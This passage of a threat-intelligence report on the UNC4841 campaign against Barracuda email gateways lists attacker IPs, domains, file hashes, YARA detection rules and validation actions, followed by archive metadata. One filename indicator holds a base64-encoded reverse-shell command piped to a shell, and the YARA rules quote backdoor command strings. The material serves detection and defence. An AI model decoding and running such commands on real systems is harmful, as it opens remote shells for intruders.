LLC BR\r\n23.224.42.5 40065 Choopa, LLC US\r\n23.224.42.29 40065 Cnservers LLC US\r\n23.224.78.130 40065 Cnservers LLC US\r\n23.224.78.131 40065 Cnservers LLC US\r\n23.224.78.132 40065 Cnservers LLC US\r\n23.224.78.133 40065 Cnservers LLC US\r\n23.224.78.134 40065 Cnservers LLC US\r\n37.9.35.217 202422 G-Core Labs S.A. US\r\n38.54.1.82 138915 Kaopu Cloud HK Limited SG\r\n38.54.113.205 138915 Kaopu Cloud HK Limited MY\r\n38.60.254.165 174 Cogent Communications US\r\n45.148.16.42 42675 Obehosting AB DK\r\n45.148.16.46 42675 Obehosting AB DK\r\n45.154.253.153 41634 Svea Hosting AB GB\r\n45.154.253.154 41634 Svea Hosting AB GB\r\n45.63.76.67 20473 Choopa, LLC US\r\n51.91.79.17 16276 OVH SAS FR\r\n52.23.241.105 14618 Amazon.com US\r\n54.197.109.223 14618 AMAZON-AES US\r\n64.176.4.234 20473 Choopa, LLC US\r\n64.176.7.59 20473 Choopa, LLC US\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 13 of 23\n\nDomains\r\nbestfindthetruth[.]com\r\ngoldenunder[.]com\r\nnote.goldenunder[.]com\r\nsingamofing[.]com\r\nsingnode[.]com\r\nmx01.bestfindthetruth[.]com\r\nxxl17z.dnslog[.]cn\r\nHost IOCs\r\nHash Filename\r\n06528143748b54793b2a7561d96138c5 abcdefg=qwesdnfkjsdhijklmnopqrstuvwxynanfasdjkfjksajdfkljeklnfisndfnhishdfhnsdanfsdnfhhhfhasdfjkqwe\r\n4495cb72708f486b734de6b6c6402aba abcdefg=a123sdffsdfsdafsadfasdfsadfhijklmnopqrstuvwxyzssdffggsdfasdfafjklsadjfneiunsdfhnsndfn52023.tx\r\n61514ac639721a51e98c47f2ac3afe81 abcdefg=abcdfwdsaifnihdnfgiyushadhijklmnopqrstuvwxyznfhjhauidsdfasdsdfqwer5we212rsahfeadssbn3741\r\nf667939000c941e5b9dc91303c98b7fc abcdefg=aasadfewsdfsadnhijklmnopqrstuvwxyzxcjvueortyuiqwnem,nxcnngvmdfngkdjfgkjdiogjevdsfvjdfjvk\r\nfe1e2d676c91f899b706682b70176983\r\nabcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsI\r\n$abcdefg|${ee}se64 -d|${G}h;wh66489.txt\r\n0d67f50a0bf7a3a017784146ac41ada0 snapshot.tar\r\n7a31d314247ac33ae39a9248b770d717 snapshot.tar\r\n206b05ef55aff6fa453ba8e5f6c55167 imgfile.jpg\r\n42722b7d04f58dcb8bd80fe41c7ea09e 11111.tar\r\n5392fb400bd671d4b185fb35a9b23fd3 snapshot.tar\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 14 of 23\n\n878cf1de91f3ae543fd290c31adcbda4 snapshot.tar\r\nac4fb6d0bfc871be6f68bfa647fc0125 abcdefg=aasadfewsdfsadnhijklmnopqrstuvwxyzxcjvueortyuiqwnem,nxcnngvmdfngkdjfgkjdiogjevdsfvjdfjvk\r\n479315620c9a5a62a745ab586ba7b78c unknown\r\n683acdb559bbc7fb64431d1f579a8104 unknown\r\nef00c92fa005c2f61ec23d5278a8fa25 unknown\r\nff4f425be50bacbb10f16287aaddb7e3 unknown\r\n94b6f76da938ef855a91011f16252d59 core_check.sh\r\n32ffe48d1a8ced49c53033eb65eff6f3 BarracudaMailService.1\r\n8406f74ac2c57807735a9b86f61da9f9 intent\r\nd81263e6872cc805e6cf4ca05d86df4e mod_content.lua\r\nda06e7c32f070a9bb96b720ef332b50b nfsd.ko\r\nc5c93ba36e079892c1123fe9dffd660f unknown\r\n19e373b13297de1783cecf856dc48eb0 client_linux\r\nc56d7b86e59c5c737ee7537d7cf13df1 autoins\r\ncb0f7f216e8965f40a724bc15db7510b update_v35.sh\r\n881b7846f8384c12c7481b23011d8e45 update_v31.sh\r\nf5ab04a920302931a8bd063f27b745cc intent_helo\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 15 of 23\n\n0245e7f9105253ecb30de301842e28e4 unknown\r\n0c227990210e7e9d704c165abd76ebe2 unknown\r\n132a342273cd469a34938044e8f62482 unknown\r\n1bc5212a856f028747c062b66c3a722a unknown\r\n2d841cb153bebcfdee5c54472b017af2 rc\r\n2e30520f8536a27dd59eabbcb8e3532a unknown\r\n349ca242bc6d2652d84146f5f91c3dbb intentbas\r\n3e3f72f99062255d6320d5e686f0e212 unknown\r\n4c1c2db989e0e881232c7748593d291e unknown\r\n7d7fd05b262342a9e8237ce14ec41c3b unknown\r\n8fc03800c1179a18fbd58d746596fa7d update_version\r\na45ca19435c2976a29300128dc410fd4 unknown\r\nba7af4f98d85e5847c08cf6cefdf35dc rc\r\nc528b6398c86f8bdcfa3f9de7837ebfe update_v2.sh\r\nc7a89a215e74104682880def469d4758 unknown\r\nc979e8651c1f40d685be2f66e8c2c610 rc\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 16 of 23\n\nd1392095086c07bd8d2ef174cb5f6ca8 intent_bas\r\nad1dc51a66201689d442499f70b78dea unknown\r\ndde2d3347b76070fff14f6c0412f95ba run.sh\r\n858174c8f4a45e9564382d4480831c6b unknown\r\n2ccb9759800154de817bf779a52d48f8 update_v31.sh\r\n177add288b289d43236d2dba33e65956 pd\r\ne52871d82de01b7e7f134c776703f696 rverify\r\n336c12441b7a678280562729c974a840 unknown\r\n5fdee67c82f5480edfa54afc5a9dc834 install_bvp74_auth.tar\r\n407738e565b4e9dafb07b782ebcf46b0 unknown\r\n67a4556b021578e0a421fdc251f07e04 install_bvp74_auth.tar\r\n694cdb49879f1321abb4605adf634935 install_bvp74_auth.tar\r\n6f79ef58b354fd33824c96625590c244 intent_reuse\r\n7ebd5f3e800dcd0510cfcbe2351d3838 unknown\r\nd098fe9674b6b4cb540699c5eb452cb5 test.sh\r\n03e07c538a5e0e7906af803a83c97a1e r\r\n0dd78b785e7657999d05d52a64b4c4cf unknown\r\n35a432e40da597c7ab63ff16b09d19d8 unknown\r\n806250c466824a027e3e85461dc672db hw-set\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 17 of 23\n\n830fca78440780aef448c862eee2a8ac hw-set\r\nb354111afc9c6c26c1475e761d347144 hw-set\r\nb745626b36b841ed03eddfb08e6bb061 libutil.so\r\nb860198feca7398bc79a8ec69afc65ed hw-set\r\nc2e577c71d591999ad5c581e49343093 run.sh\r\ne68cd991777118d76e7bce163d8a2bc1 hw-set\r\ned648c366b6e564fc636c072bbcac907 reprod_run.sh\r\nff005f1ff98ec1cd678785baa0386bd1 hw-set\r\na28de396aa91b7faca35e861b634c502 foxdoor_shell\r\n1b1830abaf95bd5a44aa3873df901f28 unknown\r\n1fea55b7c9d13d822a64b2370d015da7 mod_udp.so\r\n3b93b524db66f8bb3df8279a141734bb mod_rtf.so.so\r\n4cd0f3219e98ac2e9021b06af70ed643 mod_udp.so\r\n4ec4ceda84c580054f191caa09916c68 mod_rft.so\r\n64c690f175a2d2fe38d3d7c0d0ddbb6e mod_udp.so\r\n827d507aa3bde0ef903ca5dec60cdec8 mod_udp.so\r\n831d41ba2a0036540536c2f884d089f9 sendscd\r\n8fdf3b7dc6d88594b8b5173c1aa2bc82 mod_rft.so\r\n9bc6d6af590e7d94869dee1d33cc1cae unknown\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 18 of 23\n\nb601fce4181b275954e3f35b18996c92 install_reuse\r\n9033dc5bac76542b9b752064a56c6ee4 nfsd_stub.ko\r\ncd2813f0260d63ad5adf0446253c2172 require_helo.lua\r\ncd2813f0260d63ad5adf0446253c2576 unknown\r\n666da297066a2596cacb13b3da9572bf mod_sender.lua\r\n35cf6faf442d325961935f660e2ab5a0 mod_attachment.lua\r\nce67bb99bc1e26f6cb1f968bc1b1ec21 unknown\r\n025046adfa7b2cf50f86f5e0c6bb2ab7 unknown\r\n0805b523120cc2da3f71e5606255d29c resize_reisertab\r\n17696a438387248a12cc911fbae8620e resize_reisertab\r\n19ebfe05040a8508467f9415c8378f32 BarracudaMailService\r\n1b92e5455de794af560f10a907d931cc resize2fstab\r\n1bbb32610599d70397adfdaf56109ff3 BarracudaMailService\r\n23f4f604f1a05c4abf2ac02f976b746b unknown\r\n3c20617f089fe5cc9ba12c43c6c072f5 unknown\r\n45b79949276c9cb9cf5dc72597dc1006 resize_reisertab\r\n4b511567cfa8dbaa32e11baf3268f074 BarracudaMailService\r\n4ca4f582418b2cc0626700511a6315c0 BarracudaMailService\r\n5d6cba7909980a7b424b133fbac634ac BarracudaMailService\r\n69ef9a9e8d0506d957248e983d22b0d5 resize2fstab\r\n724079649f690ca1ee80b8b3125b58b9 unknown\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 19 of 23\n\n76811232ede58de2faf6aca8395f8427 resize2fstab\r\n82eaf69de710abdc5dea7cd5cb56cf04 BarracudaMailService\r\n8f1c40bd3ab33d517839ca17591d8666 resize2fstab\r\na08a99e5224e1baf569fda816c991045 BarracudaMailService\r\nbef722484288e24258dd33922b1a7148 resize2fstab\r\nd8e748b1b609d376f57343b2bde94b29 unknown\r\ndb4c48921537d67635bb210a9cb5bb52 BarracudaMailService\r\ne80a85250263d58cc1a1dc39d6cf3942 BarracudaMailService\r\nf6857841a255b3b4e4eded7a66438696 unknown\r\nfe031a93c84aa3d01e2223a6bb988fa0 unknown\r\n3273a29d15334efddd8276af53c317fb mknod\r\n446f3d71591afa37bbd604e2e400ae8b mknod\r\n87847445f9524671022d70f2a812728f mod_content.lua\r\n9aa90d767ba0a3f057653aadcb75e579 unknown\r\ne4e86c273a2b67a605f5d4686783e0cc mknod\r\nec0d46b2aa7adfdff10a671a77aeb2ae unknown\r\n436587bad5e061a7e594f9971d89c468 saslautchd\r\n85c5b6c408e4bdb87da6764a75008adf rverify\r\nf013a111044f3228b978f49e1ee374fe mod_attachment.lua\r\n90a75b588f63c6a0294a48e93628aec9 nfsd_stub.ko\r\nDetection Rules\r\nYARA Rules\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 20 of 23\n\nrule M_APT_Installer_SKIPJACK_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"e4e86c273a2b67a605f5d4686783e0cc\"\r\nstrings:\r\n $str1 = \"hdr:name() == 'Content-ID'\" base64\r\n $str2 = \"hdr:body() ~= nil\" base64\r\n $str3 = \"string.match(hdr:body(),\\\"^[%w%+/=\\\\r\\\\n]+$\\\")\" base64\r\n $str4 = \"openssl aes-256-cbc\" base64\r\n $str5 = \"mod_content.lua\"\r\n $str6 = \"#!/bin/sh\"\r\ncondition:\r\n all of them\r\n}\r\nSKIPJACK Installer\r\nrule M_APT_Backdoor_SKIPJACK_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"87847445f9524671022d70f2a812728f\"\r\n \r\nstrings:\r\n $str1 = \"hdr:name() == 'Content-ID'\"\r\n $str2 = \"hdr:body() ~= nil\"\r\n $str3 = \"string.match(hdr:body(),\\\"^[%w%+/=\\\\r\\\\n]+$\\\")\"\r\n $str4 = \"openssl aes-256-cbc\"\r\n $str5 = \"| base64 -d| sh 2\u003e\"\r\ncondition:\r\n all of them\r\n}\r\nTSKIPJACK Backdoor\r\nrule M_APT_Backdoor_DEPTHCHARGE_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"b745626b36b841ed03eddfb08e6bb061\"\r\nstrings:\r\n $backdoor_command_main = { 65 63 68 6F 20 2D 6E 20 27 25 73 27 20 7C (20 62 61 73 65 36 34 20 2D 64 20 7C 20 | 20 ) 6F 7\r\n $e1 = \"welcomeflag\" fullword\r\n $e2 = \"welcomebuffer\" fullword\r\n $e3 = \"launch_backdoor\" fullword\r\n $e4 = \"backdoor_initalize\" fullword\r\n $s1 = \"BSMTP_ID\" fullword\r\n $s2 = \"result %d\" fullword\r\n $s3 = \"ehlo\" fullword\r\ncondition:\r\n uint32(0)==0x464c457f and $backdoor_command_main and 4 of them\r\n}\r\nDEPTHCHARGE\r\nrule M_APT_Launcher_FOXGLOVE_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"c9ae8bfd08f57d955465f23a5f1c09a4\"\r\nstrings:\r\n $str1 = { 48 ?? 66 6F 78 64 6F 6F 72 5F 48 89 ?? C7 ?? ?? 73 68 65 6C 66 C7 ?? ?? 6C 00 }\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 21 of 23\n\n$str2 = { 48 ?? 2F 75 73 72 2F 73 68 61 48 ?? 72 65 2F 66 6F 78 64 6F 48 89 ?? 48 89 ?? ?? 48 ?? 6F 72 2F 66 6F 78 64 6F\r\n $str3 = \"shell\"\r\n $str4 = \"start.c\"\r\n $str5 = \"base64en\"\r\n $str6 = \"base64de\"\r\n $str7 = \"-r\"\r\n $str8 = \"-s\"\r\n $str9 = \"-p\"\r\n $str10 = \"-t\"\r\ncondition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nFOXGLOVE\r\nrule M_APT_Backdoor_FOXTROT_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"a28de396aa91b7faca35e861b634c502\"\r\n \r\nstrings:\r\n $str1 = \"/usr/share/foxdoor/uuid\"\r\n $str2 = \"/.mozilla/firefox/\"\r\n $str3 = \"hide_foxdoor_mod\"\r\n $str4 = \"POST /api/index.cgi\"\r\n $str5 = \"7(Zu9YTsA7qQ#vw\"\r\n $str6 = \"CONNECT %s:%d HTTP/1.1\"\r\n $str7 = \"network.proxy.http_port\"\r\n $str8 = \"exec bash --rcfile\"\r\ncondition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nFOXTROT\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA106-709\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #10\r\nA106-710\r\nA106-710\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #2\r\nA106-711\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #3\r\nA106-712\r\nCommand and Control \r\nUNC4841, DNS Query, Variant #11\r\nA106-713\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #4\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 22 of 23\n\nA106-714\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #5\r\nA106-715\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #8\r\nA106-716\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #7\r\nA106-717\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #6\r\nA106-718\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #9\r\nA106-719\r\nMalicious File Transfer\r\nUNC4841, DEPTHCHARGE, Download, Variant #1\r\nA106-720\r\nMalicious File Transfer\r\nUNC4841, SALTWATER, Download, Variant #2\r\nA106-721\r\nMalicious File Transfer\r\nUNC4841, FOXTROT, Download, Variant #1\r\nA106-722\r\nMalicious File Transfer\r\nUNC4841, SKIPJACK, Download, Variant #2\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 23 of 23\n\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation \n213.156.153.34 202422 G-Core Labs S.A. US\n216.238.112.82 20473 Choopa, LLC BR\n23.224.42.5 40065 Choopa, LLC US\n23.224.42.29 40065 Cnservers LLC US\n23.224.78.130 40065 Cnservers LLC US\n23.224.78.131 40065 Cnservers LLC US\n23.224.78.132 40065 Cnservers LLC US\n23.224.78.133 40065 Cnservers LLC US\n23.224.78.134 40065 Cnservers LLC US\n37.9.35.217 202422 G-Core Labs S.A. US\n38.54.1.82 138915 Kaopu Cloud HK Limited SG\n38.54.113.205 138915 Kaopu Cloud HK Limited MY\n38.60.254.165 174 Cogent Communications US\n45.148.16.42 42675 Obehosting AB DK\n45.148.16.46 42675 Obehosting AB DK\n45.154.253.153 41634 Svea Hosting AB GB\n45.154.253.154 41634 Svea Hosting AB GB\n45.63.76.67 20473 Choopa, LLC US\n51.91.79.17 16276 OVH SAS FR\n52.23.241.105 14618 Amazon.com US\n54.197.109.223 14618 AMAZON-AES US\n64.176.4.234 20473 Choopa, LLC US\n64.176.7.59 20473 Choopa, LLC US\n Page 13 of 23", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation" ], "report_names": [ "unc4841-post-barracuda-zero-day-remediation" ], "threat_actors": [ { "id": "a2c3c22a-b3db-4d4a-9a5a-76bfe6171843", "created_at": "2023-11-21T02:00:07.315543Z", "updated_at": "2026-04-10T02:00:03.461446Z", "deleted_at": null, "main_name": "UNC4841", "aliases": [ "SLIME57" ], "source_name": "MISPGALAXY:UNC4841", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f0eca237-f191-448f-87d1-5d6b3651cbff", "created_at": "2024-02-06T02:00:04.140087Z", "updated_at": "2026-04-10T02:00:03.577326Z", "deleted_at": null, "main_name": "GhostEmperor", "aliases": [ "OPERATOR PANDA", "FamousSparrow", "UNC2286", "Salt Typhoon", "RedMike" ], "source_name": "MISPGALAXY:GhostEmperor", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9df8987a-27fc-45c5-83b0-20dceb8288af", "created_at": "2025-10-29T02:00:51.836932Z", "updated_at": "2026-04-10T02:00:05.253487Z", "deleted_at": null, "main_name": "UNC3886", "aliases": [ "UNC3886" ], "source_name": "MITRE:UNC3886", "tools": [ "MOPSLED", "VIRTUALPIE", "CASTLETAP", "THINCRUST", "VIRTUALPITA", "RIFLESPINE" ], "source_id": "MITRE", "reports": null }, { "id": "a08d93aa-41e4-4eca-a0fd-002d051a2c2d", "created_at": "2024-08-28T02:02:09.711951Z", "updated_at": "2026-04-10T02:00:04.957678Z", "deleted_at": null, "main_name": "UNC3886", "aliases": [ "Fire Ant" ], "source_name": "ETDA:UNC3886", "tools": [ "BOLDMOVE", "CASTLETAP", "LOOKOVER", "MOPSLED", "RIFLESPINE", "TABLEFLIP", "THINCRUST", "Tiny SHell", "VIRTUALGATE", "VIRTUALPIE", "VIRTUALPITA", "VIRTUALSHINE", "tsh" ], "source_id": "ETDA", "reports": null }, { "id": "1c91699d-77d3-4ad7-9857-9f9196ac1e37", "created_at": "2023-11-04T02:00:07.663664Z", "updated_at": "2026-04-10T02:00:03.385989Z", "deleted_at": null, "main_name": "UNC3886", "aliases": [], "source_name": "MISPGALAXY:UNC3886", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff", "created_at": "2024-12-28T02:01:54.899899Z", "updated_at": "2026-04-10T02:00:04.880446Z", "deleted_at": null, "main_name": "Salt Typhoon", "aliases": [ "Earth Estries", "FamousSparrow", "GhostEmperor", "Operator Panda", "RedMike", "Salt Typhoon", "UNC2286" ], "source_name": "ETDA:Salt Typhoon", "tools": [ "Agentemis", "Backdr-NQ", "Cobalt Strike", "CobaltStrike", "Crowdoor", "Cryptmerlin", "Deed RAT", "Demodex", "FamousSparrow", "FuxosDoor", "GHOSTSPIDER", "HemiGate", "MASOL RAT", "Mimikatz", "NBTscan", "NinjaCopy", "ProcDump", "PsExec", "PsList", "SnappyBee", "SparrowDoor", "TrillClient", "WinRAR", "Zingdoor", "certutil", "certutil.exe", "cobeacon", "nbtscan" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434417, "ts_updated_at": 1775791825, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/03f2b901f28993757ec9aaefff97e443035b7190.pdf", "text": "https://archive.orkl.eu/03f2b901f28993757ec9aaefff97e443035b7190.txt", "img": "https://archive.orkl.eu/03f2b901f28993757ec9aaefff97e443035b7190.jpg" } }